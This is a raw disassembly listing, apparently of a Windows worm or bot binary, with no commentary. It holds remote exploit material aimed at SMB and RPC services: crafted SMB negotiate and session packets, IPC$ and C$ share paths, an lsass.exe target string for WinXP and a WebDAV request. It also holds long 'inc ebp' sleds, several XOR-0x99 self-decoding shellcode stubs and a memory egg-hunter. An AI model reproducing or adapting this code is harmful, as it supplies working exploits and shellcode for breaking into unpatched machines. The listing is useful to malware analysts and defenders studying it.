; ---------------------------------------------------------------------------
align 8
loc_430328: ; DATA XREF: sub_413C0C:loc_413D25�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 8
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_413C0C+18B�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
dword_4303C0 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; .text:00414735�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_430410 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_4142AE+12C�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_430774 dd 20h, 0 dd 20h, 5C005Ch, 0
off_430788 dd offset off_43005C ; DATA XREF: sub_4142AE+177�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dword_4307C8 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_4142AE+4A�o
; sub_4142AE+90�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_4308D8 dd 10016C6h dword_4308DC dd 100139Dh ; sub_4142AE+115�r
; ---------------------------------------------------------------------------
loc_4308E0: ; DATA XREF: .text:004148FE�o
call $+5
pop eax
xor ax, ax
loc_4308E9: ; CODE XREF: .text:004308F0�j
; .text:004308F9�j
inc eax
cmp dword ptr [eax], 6D6F6364h
jnz short loc_4308E9
cmp dword ptr [eax+4], 72307868h
jnz short loc_4308E9
add eax, 8
jmp eax
; ---------------------------------------------------------------------------
aRrrrrrrrrrrr_0 db ''
db ''
db ''
db '',0
align 8
dword_430A08 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset off_43005C
a123456111111_0:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 3 dup(0)
a127_0_0_1Ipc:
unicode 0, <127.0.0.1\IPC$\>
; ---------------------------------------------------------------------------
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_430E6C: ; CODE XREF: .text:00431074�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_43103F: ; CODE XREF: .text:004310A7�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
jmp loc_430E6C
; ---------------------------------------------------------------------------
db 3 dup(45h)
; ---------------------------------------------------------------------------
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_43109D: ; CODE XREF: .text:004310AB�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
add [esp+edx+54h], cl
jl short loc_43103F
mov ah, 0A1h
ja short loc_43109D
mov eax, ds:0AFA977EDh
mov eax, ds:41414177h
inc ecx
; ---------------------------------------------------------------------------
dd 77FCC662h
off_4310BC dd offset dword_480D58 ; DATA XREF: sub_414D71+73�r
; .text:00414F16�r ...
; ---------------------------------------------------------------------------
jmp short loc_4310D2
; =============== S U B R O U T I N E =======================================
sub_4310C2 proc far ; CODE XREF: sub_4310C2:loc_4310D2�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_4310CA: ; CODE XREF: sub_4310C2+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_4310CA
jmp short loc_4310D7
; ---------------------------------------------------------------------------
loc_4310D2: ; CODE XREF: .text:004310C0�j
call near ptr sub_4310C2
loc_4310D7: ; CODE XREF: sub_4310C2+E�j
jo short loc_43113B
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_431159
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_43113B: ; CODE XREF: sub_4310C2:loc_4310D7�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_431159: ; CODE XREF: sub_4310C2+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_4310C2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_431200: ; DATA XREF: sub_415242+112�o
; sub_415242+1D9�o
jmp short loc_431212
; =============== S U B R O U T I N E =======================================
sub_431202 proc near ; CODE XREF: sub_431202:loc_431212�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_43120A: ; CODE XREF: sub_431202+C�j
xor byte ptr [edx+ecx], 99h
loop loc_43120A
jmp short loc_431217
; ---------------------------------------------------------------------------
loc_431212: ; CODE XREF: .text:loc_431200�j
call sub_431202
loc_431217: ; CODE XREF: sub_431202+E�j
jo short near ptr dword_431190+1Eh
cwde
cdq
cdq
retn
sub_431202 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_4312B0 dw 4B9Dh ; DATA XREF: sub_415242+E5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_431398 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:004156C0�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_431428 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004156EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_4314D8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415714�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4315B8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+53�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_415242+90�o
unicode 0, <C$>,0
a????? db '?????',0
align 10h
dword_431620 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+28B�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_431690 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+2B2�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_431738 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+383�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4317B8 dd offset loc_401494+1 ; DATA XREF: sub_415242+3A6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_431850 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+2E2�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_4318C0 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_415242+307�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_431938 dd 0 dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 2 dup(0)
word_4319C0 dw 0AD9Dh ; DATA XREF: sub_4150F9+2A�r
; sub_415242+CC�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_431A00 dd 1004600h ; sub_415242+223�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_431AB8: ; DATA XREF: .text:00415961�o
; .text:004159DF�o
jmp short loc_431ACA
; =============== S U B R O U T I N E =======================================
sub_431ABA proc near ; CODE XREF: sub_431ABA:loc_431ACA�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_431AC2: ; CODE XREF: sub_431ABA+C�j
xor byte ptr [edx+ecx], 99h
loop loc_431AC2
jmp short loc_431ACF
; ---------------------------------------------------------------------------
loc_431ACA: ; CODE XREF: .text:loc_431AB8�j
call sub_431ABA
loc_431ACF: ; CODE XREF: sub_431ABA+E�j
jo short near ptr dword_431A3C+2Ah
cwde
cdq
cdq
retn
sub_431ABA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_431B68 dw 4B9Dh ; DATA XREF: .text:00415942�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_431C50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00415B0C�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_431CE0 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415B3E�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_431D90 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415B69�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
